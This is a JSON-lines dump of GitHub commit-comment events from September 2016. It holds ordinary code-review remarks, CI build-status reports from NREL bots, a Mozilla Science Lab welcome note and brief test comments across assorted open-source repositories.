{"id":"4600301307","type":"CommitCommentEvent","actor":{"login":"auremoser"},"repo":{"name":"gautamkrishnar/studyGroup"},"payload":{"comment":{"id":19124579,"position":null,"line":null,"path":null,"commit_id":"3a9a5d17217d24c2d5dde58989e913992271c8bb","created_at":"2016-09-22T04:03:12Z","updated_at":"2016-09-22T04:03:12Z","body":"Hi @gautamkrishnar ,\r\nJust a friendly 'hello' from the [Mozilla Science Lab](https://science.mozilla.org/); it's great to hear you're building a [Study Group](https://github.com/mozillascience/studygroup).\r\n\r\nMy name is [Aurelia](https://twitter.com/auremoser) and I work at the Mozilla Science Lab, a group building projects/programs globally to support open research and citizen science, including the Study Groups project. Just wanted to introduce myself as a resource, and answer any questions you might have.\r\n\r\nFeel free to:\r\n* search for ideas in [the handbook](http://mozillascience.github.io/studyGroupHandbook/)\r\n* use our [library of lessons](https://github.com/mozillascience/studyGroupLessons) for your events\r\n* [enable \"issues\" on your repo](http://programmers.stackexchange.com/questions/179468/forking-a-repo-on-github-but-allowing-new-issues-on-the-fork) so that others can join the conversation and contribute\r\n* join our monthly study group call (first Fridays, 11AM EST), [subscribe to our mailing list to be notified of those calls](https://mail.mozilla.org/listinfo/msl-study-groups)\r\n* follow our #mozstudy hashtag on twitter, or [our list](https://twitter.com/MozillaScience/lists/mozstudy), ping [@auremoser](https://twitter.com/auremoser) to be added\r\n\r\n**Our next monthly call is on October 7th, 11am EST, join us: https://public.etherpad-mozilla.org/p/mozilla-studygroup-leads-october-2016**\r\n\r\nEmail Aurelia at [aurelia@mozillafoundation.org](mailto:aurelia@mozillafoundation.org) with questions, we would love to learn about your lessons, challenges, topic of interest, and events.\r\n\r\nThanks for reading!\r\n\r\nAurelia\r\nMozilla Science Lab\r\n[@MozillaScience](https://twitter.com/auremoser)\r\n"}},"created_at":"2016-09-22T04:03:12Z"}
{"id":"4600314854","type":"CommitCommentEvent","actor":{"login":"chendocment"},"repo":{"name":"chendocment/repositorychen"},"payload":{"comment":{"id":19124608,"position":null,"line":null,"path":null,"commit_id":"9f2f49b5abce49c62bf98ebe3154285eeffa8227","created_at":"2016-09-22T04:08:59Z","updated_at":"2016-09-22T04:08:59Z","body":"hello"}},"created_at":"2016-09-22T04:08:59Z"}
{"id":"4600316786","type":"CommitCommentEvent","actor":{"login":"chendocment"},"repo":{"name":"chendocment/repositorychen"},"payload":{"comment":{"id":19124617,"position":null,"line":null,"path":null,"commit_id":"9f2f49b5abce49c62bf98ebe3154285eeffa8227","created_at":"2016-09-22T04:09:51Z","updated_at":"2016-09-22T04:09:51Z","body":"hello 2\r\n\r\n- [ ] \r\n\r\n- \r\n\r\n> # **__**"}},"created_at":"2016-09-22T04:09:51Z"}
{"id":"4600317050","type":"CommitCommentEvent","actor":{"login":"mrmachine"},"repo":{"name":"ic-labs/django-icekit"},"payload":{"comment":{"id":19124619,"position":10,"line":57,"path":"icekit/plugins/image/tests.py","commit_id":"aa4f64a06f75513695a6be4f4b65b924af3577d4","created_at":"2016-09-22T04:09:58Z","updated_at":"2016-09-22T04:09:58Z","body":"@cogat Can we add a real image inside this test (with this context manager https://github.com/ic-labs/django-icekit/blob/47ee841501c9b37510a10fea5194bb306e7727cc/icekit/utils/testing.py#L16) instead of skipping the test?\r\n\r\nI think the bit of this test that is breaking was only added a couple days ago too, and we shouldn't skip the whole test because a new addition to the test wasn't working. In fact the new addition might not even be relevant for this test, which is checking which template is being used to render?"}},"created_at":"2016-09-22T04:09:58Z"}
{"id":"4600321124","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19124628,"position":null,"line":null,"path":null,"commit_id":"74433cbb8e22190e75620292ea1cca2461d1dac0","created_at":"2016-09-22T04:11:49Z","updated_at":"2016-09-22T04:11:49Z","body":"update_standards_gem (asparke2) - Win64-Windows-7-VisualStudio-12: OK (2408 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-74433cbb8e22190e75620292ea1cca2461d1dac0-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-74433cbb8e22190e75620292ea1cca2461d1dac0-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.37%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T04:11:49Z"}
{"id":"4600321818","type":"CommitCommentEvent","actor":{"login":"masa1982"},"repo":{"name":"shelima/shelima.github.io"},"payload":{"comment":{"id":19124631,"position":4,"line":3,"path":"_posts/2014-3-3-Hello-World.md","commit_id":"bd136dcf160b6e12afe553f44bff330a8ce7c437","created_at":"2016-09-22T04:12:08Z","updated_at":"2016-09-22T04:12:08Z","body":"テスト"}},"created_at":"2016-09-22T04:12:08Z"}
{"id":"4600329259","type":"CommitCommentEvent","actor":{"login":"shilinlee"},"repo":{"name":"shilinlee/we7_addons"},"payload":{"comment":{"id":19124648,"position":null,"line":null,"path":null,"commit_id":"a741071170dc90362b24d4432eef7cd22064adba","created_at":"2016-09-22T04:15:31Z","updated_at":"2016-09-22T04:15:31Z","body":"网页授权，获取基础信息"}},"created_at":"2016-09-22T04:15:31Z"}
{"id":"4600335538","type":"CommitCommentEvent","actor":{"login":"calda"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19124662,"position":10,"line":10,"path":"src/main/java/agilepuppers/cleanwater/SceneSwitcher.java","commit_id":"8819e7ae2a03b19ba535c320f93d7eb8405d2edc","created_at":"2016-09-22T04:18:31Z","updated_at":"2016-09-22T04:18:31Z","body":"I think this would make more sense as methods on the App object. `Controller.APP.setScene(\"LoginScreen\");`"}},"created_at":"2016-09-22T04:18:31Z"}
{"id":"4600337803","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"jd4564/Pokemon-Showdown"},"payload":{"comment":{"id":19124666,"position":null,"line":null,"path":null,"commit_id":"fbb303c7305d3401b9a8a8ad13179746b855e74f","created_at":"2016-09-22T04:19:40Z","updated_at":"2016-09-22T04:19:40Z","body":"Can we be more specific in our commit names :|"}},"created_at":"2016-09-22T04:19:40Z"}
{"id":"4600339025","type":"CommitCommentEvent","actor":{"login":"daurnimator"},"repo":{"name":"brimworks/lua-zlib"},"payload":{"comment":{"id":19124668,"position":12,"line":19,"path":"rockspec","commit_id":"dc43eaa1f5d4f523cfde2dd32097796199dbdf07","created_at":"2016-09-22T04:20:16Z","updated_at":"2016-09-22T04:20:16Z","body":"Usually `< 5.4` is prefered"}},"created_at":"2016-09-22T04:20:16Z"}
{"id":"4600340455","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124671,"position":null,"line":null,"path":null,"commit_id":"650812d93734602d1b26a65b29224e24334c8061","created_at":"2016-09-22T04:20:54Z","updated_at":"2016-09-22T04:20:54Z","body":"If I might make two suggestions:\r\n\r\n1. `from module import *` is kinda dangerous. Explicit imports are awesome. \r\n2. It'd be awesome if the networking classes were in the same file. So, BaseSocket, BaseConnection, BaseDaemon"}},"created_at":"2016-09-22T04:20:54Z"}
{"id":"4600341175","type":"CommitCommentEvent","actor":{"login":"calda"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19124674,"position":8,"line":8,"path":"src/main/java/agilepuppers/cleanwater/controller/Controller.java","commit_id":"8819e7ae2a03b19ba535c320f93d7eb8405d2edc","created_at":"2016-09-22T04:21:13Z","updated_at":"2016-09-22T04:21:13Z","body":"If we're going to have an App singleton, it should be a static variable on the App class. The Cocoa style would be `App.sharedInstance` but I like the sound of `App.current` maybe?"}},"created_at":"2016-09-22T04:21:13Z"}
{"id":"4600342283","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124677,"position":null,"line":null,"path":null,"commit_id":"4bdc98f23f43f30ccc637e47e255f278fcdc4a5e","created_at":"2016-09-22T04:21:40Z","updated_at":"2016-09-22T04:21:40Z","body":"You might redirect the __print__ function to do logging. I never did it properly because I wasn't sure how to yet"}},"created_at":"2016-09-22T04:21:40Z"}
{"id":"4600345609","type":"CommitCommentEvent","actor":{"login":"calda"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19124686,"position":10,"line":10,"path":"src/main/java/agilepuppers/cleanwater/SceneSwitcher.java","commit_id":"8819e7ae2a03b19ba535c320f93d7eb8405d2edc","created_at":"2016-09-22T04:23:14Z","updated_at":"2016-09-22T04:23:14Z","body":"also is it possible that we could have multiple stages active at any given time?"}},"created_at":"2016-09-22T04:23:14Z"}
{"id":"4600346487","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124689,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T04:23:39Z","updated_at":"2016-09-22T04:23:39Z","body":"Using `protocol` as a variable name makes lots of things ambiguous. Especially since you're importing it.\r\n\r\nYou no longer know if protocol is referring to an argument or a class. And because it's from an `import *`, other people looking won't even know that `protocol` was imported.\r\n\r\nAlso, I used addr instead of address because that's how it's used in the socket module."}},"created_at":"2016-09-22T04:23:39Z"}
{"id":"4600347409","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124691,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T04:24:07Z","updated_at":"2016-09-22T04:24:07Z","body":"Sorry if I seem like I'm being critical. In all honesty this is awesome and helpful. I'm just trying to help out too."}},"created_at":"2016-09-22T04:24:07Z"}
{"id":"4600349822","type":"CommitCommentEvent","actor":{"login":"LokeshNewt"},"repo":{"name":"LokeshNewt/Eureka"},"payload":{"comment":{"id":19124698,"position":3,"line":59,"path":"pom.xml","commit_id":"a00338cc854eaebe3b7cdd1e383d4a71c7dbc128","created_at":"2016-09-22T04:25:13Z","updated_at":"2016-09-22T04:25:13Z","body":"not required\r\n"}},"created_at":"2016-09-22T04:25:13Z"}
{"id":"4600350589","type":"CommitCommentEvent","actor":{"login":"rmzelle"},"repo":{"name":"BYachnin/styles"},"payload":{"comment":{"id":19124700,"position":25,"line":54,"path":"protein-engineering-design-and-selection.csl","commit_id":"7cfb403958e21de48b497c65265884566aceb5ba","created_at":"2016-09-22T04:25:36Z","updated_at":"2016-09-22T04:25:36Z","body":"I was just trying to commit my own changes, but GitHub didn't let me!\r\n\r\nI think this needs `strip-periods=\"true\"`."}},"created_at":"2016-09-22T04:25:36Z"}
{"id":"4600351187","type":"CommitCommentEvent","actor":{"login":"humitos"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19124703,"position":51,"line":807,"path":"web/stories/django-girls/introduccion-a-python.rst","commit_id":"d7085bad9c8d243d9b0b2b35f3125bc4f326844b","created_at":"2016-09-22T04:25:55Z","updated_at":"2016-09-22T04:25:55Z","body":"Esto te quedo en inglés "}},"created_at":"2016-09-22T04:25:55Z"}
{"id":"4600351981","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124705,"position":null,"line":null,"path":null,"commit_id":"14594dd96a51d44dd8abf422e1613eeccfa4d7bc","created_at":"2016-09-22T04:26:17Z","updated_at":"2016-09-22T04:26:17Z","body":"Please do not mess with chord beyond refactoring. Basically anything you put in here will create merge conflicts because this part is incredibly fragile and experimental.\r\n\r\nBasically here be dragons."}},"created_at":"2016-09-22T04:26:17Z"}
{"id":"4600352477","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"zeit/hyperterm"},"payload":{"comment":{"id":19124706,"position":13,"line":9,"path":"lib/utils/plugins.js","commit_id":"8a8fdacffe370ca0e267a7cffbff6734bef43036","created_at":"2016-09-22T04:26:29Z","updated_at":"2016-09-22T04:26:29Z","body":"https://github.com/benmosher/eslint-plugin-import/issues/570 ;)"}},"created_at":"2016-09-22T04:26:29Z"}
{"id":"4600353592","type":"CommitCommentEvent","actor":{"login":"rmzelle"},"repo":{"name":"BYachnin/styles"},"payload":{"comment":{"id":19124709,"position":25,"line":54,"path":"protein-engineering-design-and-selection.csl","commit_id":"7cfb403958e21de48b497c65265884566aceb5ba","created_at":"2016-09-22T04:27:02Z","updated_at":"2016-09-22T04:27:02Z","body":"And maybe `prefix=\" (\"`?"}},"created_at":"2016-09-22T04:27:02Z"}
{"id":"4600354293","type":"CommitCommentEvent","actor":{"login":"rmzelle"},"repo":{"name":"BYachnin/styles"},"payload":{"comment":{"id":19124711,"position":51,"line":88,"path":"protein-engineering-design-and-selection.csl","commit_id":"7cfb403958e21de48b497c65265884566aceb5ba","created_at":"2016-09-22T04:27:25Z","updated_at":"2016-09-22T04:27:25Z","body":"Forgot a quote mark."}},"created_at":"2016-09-22T04:27:25Z"}
{"id":"4600354728","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19124712,"position":null,"line":null,"path":null,"commit_id":"c7303a600f53aedab8f0ec964f4bced6aa663cf6","created_at":"2016-09-22T04:27:38Z","updated_at":"2016-09-22T04:27:38Z","body":"Coverity is picky at times, so this may not clear the issue. We will get the result on the next submission. We only have a limited number of them per month, so we should wait until we need to perform a real scan against a major change.\r\n\r\nAlso see [Issue 298](http://github.com/weidai11/cryptopp/issues/298)."}},"created_at":"2016-09-22T04:27:38Z"}
{"id":"4600356049","type":"CommitCommentEvent","actor":{"login":"denzo"},"repo":{"name":"pzuraq/liquid-tether"},"payload":{"comment":{"id":19124715,"position":null,"line":null,"path":null,"commit_id":"accc85eda761801c12195ed2e6a5370686ec8187","created_at":"2016-09-22T04:28:17Z","updated_at":"2016-09-22T04:28:17Z","body":"Magical!"}},"created_at":"2016-09-22T04:28:17Z"}
{"id":"4600356120","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"zeit/hyperterm"},"payload":{"comment":{"id":19124716,"position":34,"line":80,"path":"lib/reducers/ui.js","commit_id":"8a8fdacffe370ca0e267a7cffbff6734bef43036","created_at":"2016-09-22T04:28:19Z","updated_at":"2016-09-22T04:28:19Z","body":"Just add an `default` with a `break` inside. Much more explicit."}},"created_at":"2016-09-22T04:28:19Z"}
{"id":"4600360324","type":"CommitCommentEvent","actor":{"login":"adam3smith"},"repo":{"name":"BYachnin/styles"},"payload":{"comment":{"id":19124722,"position":25,"line":54,"path":"protein-engineering-design-and-selection.csl","commit_id":"7cfb403958e21de48b497c65265884566aceb5ba","created_at":"2016-09-22T04:30:23Z","updated_at":"2016-09-22T04:30:23Z","body":"no space in the prefix -- that comes from the group delimiter on the whole bibliography. You're right though on the strip-periods."}},"created_at":"2016-09-22T04:30:23Z"}
{"id":"4600360945","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124724,"position":null,"line":null,"path":null,"commit_id":"3282e244d53fca3da36869bd607acb99911907e2","created_at":"2016-09-22T04:30:37Z","updated_at":"2016-09-22T04:30:37Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2374 of 2375 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T04:30:37Z"}
{"id":"4600362087","type":"CommitCommentEvent","actor":{"login":"ryuring"},"repo":{"name":"baserproject/basercms"},"payload":{"comment":{"id":19124726,"position":null,"line":null,"path":null,"commit_id":"90da6da2763d53e6f6566b6032ad1286920488f7","created_at":"2016-09-22T04:31:12Z","updated_at":"2016-09-22T04:31:12Z","body":"@kaburk こちら、マージしてしまってたんですが、テストに失敗してました・・・。\r\nどうやら、BcBaserHelper::subMenu() というメソッドが存在したようです。\r\nこっちで削除したエレメントについて戻しておきますね。"}},"created_at":"2016-09-22T04:31:12Z"}
{"id":"4600363607","type":"CommitCommentEvent","actor":{"login":"EllaQuimica"},"repo":{"name":"humitos/argentinaenpython.com"},"payload":{"comment":{"id":19124733,"position":null,"line":null,"path":null,"commit_id":"d7085bad9c8d243d9b0b2b35f3125bc4f326844b","created_at":"2016-09-22T04:31:53Z","updated_at":"2016-09-22T04:31:53Z","body":"Actualizado a la versión commit c4471e79f93804c7b8e37b64d7634a89766c0a81 de \r\n"}},"created_at":"2016-09-22T04:31:53Z"}
{"id":"4600363639","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"zeit/hyperterm"},"payload":{"comment":{"id":19124734,"position":38,"line":82,"path":"lib/reducers/ui.js","commit_id":"8a8fdacffe370ca0e267a7cffbff6734bef43036","created_at":"2016-09-22T04:31:53Z","updated_at":"2016-09-22T04:31:53Z","body":"`no-case-declarations` is a good rule as switch cases have surprising behavior:\r\n\r\n> This rule disallows lexical declarations (let, const, function and class) in case/default clauses. **The reason is that the lexical declaration is visible in the entire switch block but it only gets initialized when it is assigned**, which will only happen if the case where it is defined is reached.\r\n\r\nThis code would be much more readable if all the logic was moved into a function which was called in this switch case."}},"created_at":"2016-09-22T04:31:53Z"}
{"id":"4600364185","type":"CommitCommentEvent","actor":{"login":"rmzelle"},"repo":{"name":"BYachnin/styles"},"payload":{"comment":{"id":19124736,"position":25,"line":54,"path":"protein-engineering-design-and-selection.csl","commit_id":"7cfb403958e21de48b497c65265884566aceb5ba","created_at":"2016-09-22T04:32:08Z","updated_at":"2016-09-22T04:32:08Z","body":"Also, the label should appear after `<name/>`. Getting a little sloppy, here, @adam3smith 😱!"}},"created_at":"2016-09-22T04:32:08Z"}
{"id":"4600365525","type":"CommitCommentEvent","actor":{"login":"al3xback"},"repo":{"name":"al3xback/hello-world"},"payload":{"comment":{"id":19124740,"position":null,"line":null,"path":null,"commit_id":"f790f56f5a443655bda9752adfc566d2758744a5","created_at":"2016-09-22T04:32:47Z","updated_at":"2016-09-22T04:32:47Z","body":"nice"}},"created_at":"2016-09-22T04:32:47Z"}
{"id":"4600366584","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19124746,"position":null,"line":null,"path":null,"commit_id":"c098b73705d4e02f0ea2441cc2aef31777778ac7","created_at":"2016-09-22T04:33:17Z","updated_at":"2016-09-22T04:33:17Z","body":"Linha 92: Mensagem de erro em código está em pt-br.\r\nLinha 197: Mensagem de erro no código está em pt-br.\r\nLinha 212: \"assign_role(self.user, 'studenD') \" está errado a role\r\n"}},"created_at":"2016-09-22T04:33:17Z"}
{"id":"4600366917","type":"CommitCommentEvent","actor":{"login":"marcoslisboa"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":19124747,"position":24,"line":24,"path":"imports/api/tasks.js","commit_id":"8644804f6fe1b985b12f472699222195a8a8bf1f","created_at":"2016-09-22T04:33:26Z","updated_at":"2016-09-22T04:33:26Z","body":"taskIs as String?"}},"created_at":"2016-09-22T04:33:26Z"}
{"id":"4600367664","type":"CommitCommentEvent","actor":{"login":"niksedk"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19124750,"position":null,"line":null,"path":null,"commit_id":"1b5ddde1aa8c05797edd12f6fcc6ef448bf382af","created_at":"2016-09-22T04:33:51Z","updated_at":"2016-09-22T04:33:51Z","body":":)"}},"created_at":"2016-09-22T04:33:51Z"}
{"id":"4600372395","type":"CommitCommentEvent","actor":{"login":"rmzelle"},"repo":{"name":"BYachnin/styles"},"payload":{"comment":{"id":19124762,"position":25,"line":54,"path":"protein-engineering-design-and-selection.csl","commit_id":"7cfb403958e21de48b497c65265884566aceb5ba","created_at":"2016-09-22T04:36:02Z","updated_at":"2016-09-22T04:36:02Z","body":"(I'm currently getting `In (ed.) Stearns,T.,` instead of `In Köster,H. (ed),`)"}},"created_at":"2016-09-22T04:36:02Z"}
{"id":"4600373776","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19124772,"position":null,"line":null,"path":null,"commit_id":"9fc956f4d1285c9177b465e6c9a1edd24c3e4bff","created_at":"2016-09-22T04:36:38Z","updated_at":"2016-09-22T04:36:38Z","body":"Remover comentário da linha 254, não faz sentido."}},"created_at":"2016-09-22T04:36:38Z"}
{"id":"4600374892","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124778,"position":null,"line":null,"path":null,"commit_id":"97d4bf4587a4590db4273d5da9798afc6dbaaf0f","created_at":"2016-09-22T04:37:09Z","updated_at":"2016-09-22T04:37:09Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T04:37:09Z"}
{"id":"4600374988","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124779,"position":null,"line":null,"path":null,"commit_id":"3282e244d53fca3da36869bd607acb99911907e2","created_at":"2016-09-22T04:37:11Z","updated_at":"2016-09-22T04:37:11Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T04:37:11Z"}
{"id":"4600375341","type":"CommitCommentEvent","actor":{"login":"pizzaisdavid"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124781,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T04:37:21Z","updated_at":"2016-09-22T04:37:21Z","body":"All good dude! To distinguish between a class and variable, if we're following python's style guide, classes should be CapCase. https://www.python.org/dev/peps/pep-0008/#class-names \r\n\r\n`addr` ah you're right, that's something I didn't know. My personal preference is not to abbreviate, but I can deal with it being either way! "}},"created_at":"2016-09-22T04:37:21Z"}
{"id":"4600376404","type":"CommitCommentEvent","actor":{"login":"winniex1"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19124785,"position":5,"line":58,"path":"packages/liotapkg.sh","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T04:37:54Z","updated_at":"2016-09-22T04:37:54Z","body":"Yes, I definitely tested it successfully and then checked in.\r\nHowever, by somehow, I also have the folders under this wrong path. that's why it can succeed.\r\nWill modify soon."}},"created_at":"2016-09-22T04:37:54Z"}
{"id":"4600377228","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19124792,"position":null,"line":null,"path":null,"commit_id":"97d4bf4587a4590db4273d5da9798afc6dbaaf0f","created_at":"2016-09-22T04:38:21Z","updated_at":"2016-09-22T04:38:21Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-97d4bf4587a4590db4273d5da9798afc6dbaaf0f-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T04:38:21Z"}
{"id":"4600379244","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19124804,"position":null,"line":null,"path":null,"commit_id":"3ee9a1e6287652f5c525168d6fa9c197a2d32929","created_at":"2016-09-22T04:39:19Z","updated_at":"2016-09-22T04:39:19Z","body":"Erro conceitual, linha 26-27: row dentro de row, não precisa/pode. remove a interna que fica de boas. @ailsoncgt "}},"created_at":"2016-09-22T04:39:19Z"}
{"id":"4600381705","type":"CommitCommentEvent","actor":{"login":"polarlights"},"repo":{"name":"tluck/OS-X-Voodoo-PS2-Controller"},"payload":{"comment":{"id":19124813,"position":null,"line":null,"path":null,"commit_id":"875bfe166d0d2a7576384dd5809289fdc3b28587","created_at":"2016-09-22T04:40:32Z","updated_at":"2016-09-22T04:40:32Z","body":"I can't figure out that what's the dsl used for in this repo? Thank U. "}},"created_at":"2016-09-22T04:40:32Z"}
{"id":"4600383481","type":"CommitCommentEvent","actor":{"login":"1994heber"},"repo":{"name":"AlbinoDrought/LoveBoot"},"payload":{"comment":{"id":19124815,"position":4,"line":96,"path":"LoveBoot/BotLogic.cs","commit_id":"2b3b75aca2793a888cf4787100eafb6fcd1c84eb","created_at":"2016-09-22T04:41:20Z","updated_at":"2016-09-22T04:41:20Z","body":"fg"}},"created_at":"2016-09-22T04:41:20Z"}
{"id":"4600384448","type":"CommitCommentEvent","actor":{"login":"trieudh58"},"repo":{"name":"fbsamples/messenger-platform-samples"},"payload":{"comment":{"id":19124818,"position":46,"line":602,"path":"node/app.js","commit_id":"126d2505541fe25a5642685d3abaa53b785843aa","created_at":"2016-09-22T04:41:47Z","updated_at":"2016-09-22T04:41:47Z","body":"According to [this specification](https://developers.facebook.com/docs/messenger-platform/send-api-reference/quick-replies), `message` Object inside **quick_reply function** does not have the `metadata` property?\r\nI tried to set `metadata` on my code, but when user tapped into **quick_reply button**, it still returned \"DEVELOPER_DEFINED_METADATA\"."}},"created_at":"2016-09-22T04:41:47Z"}
{"id":"4600384701","type":"CommitCommentEvent","actor":{"login":"gappleto97"},"repo":{"name":"pizzaisdavid/p2p-project"},"payload":{"comment":{"id":19124819,"position":null,"line":null,"path":null,"commit_id":"0aba01fe5b91a921b788a8659b11ed2eb3b047cf","created_at":"2016-09-22T04:41:54Z","updated_at":"2016-09-22T04:41:54Z","body":"Yeah, I realized that way after I'd already got this set up. At some point I needed to refactor that, but it's way more convenient if you are 😊\r\n\r\nThere's also minor speed improvements I *know* could be done in the parser/protocol objects, because I did them in C++ (at the cost of memory footprint).\r\n\r\nAnd if you're working on refactoring, I'd *love* it if you could come up with a better name than `pathfinding_message`. It's totally misleading, because I did that when I was still coming up with concepts. It *assists* in pathfinding, but really it's a parser. A converter. Something like that.\r\n\r\nAnd because I wanted to be consistent, it's that way in four different languages now..."}},"created_at":"2016-09-22T04:41:54Z"}
{"id":"4600386397","type":"CommitCommentEvent","actor":{"login":"andermoran"},"repo":{"name":"kyro38/MiscStuff"},"payload":{"comment":{"id":19124825,"position":null,"line":null,"path":null,"commit_id":"db1f770fa563811d30b48f08ebe2a57a494ad1af","created_at":"2016-09-22T04:42:42Z","updated_at":"2016-09-22T04:42:42Z","body":"Doesn't work on el Capitan 10.11.3. The text file has no output."}},"created_at":"2016-09-22T04:42:42Z"}
{"id":"4600386521","type":"CommitCommentEvent","actor":{"login":"winniex1"},"repo":{"name":"vmware/liota"},"payload":{"comment":{"id":19124826,"position":67,"line":87,"path":"packages/examples/graphite_system_stats.py","commit_id":"6b38359ba67e59c236ee4d71dce3984e00b9dc9b","created_at":"2016-09-22T04:42:45Z","updated_at":"2016-09-22T04:42:45Z","body":"sampleProp.conf here seems a little overused. Not all metric names must be extracted from .conf file.\r\n\r\nYou can see previously passed it from sampleProp.conf. However, when I know sampling function is to read cpu procs, still getting metric name from outside is not reasonable. Outside may name it a in-relevant metric name. That's why finally I used this way. "}},"created_at":"2016-09-22T04:42:45Z"}
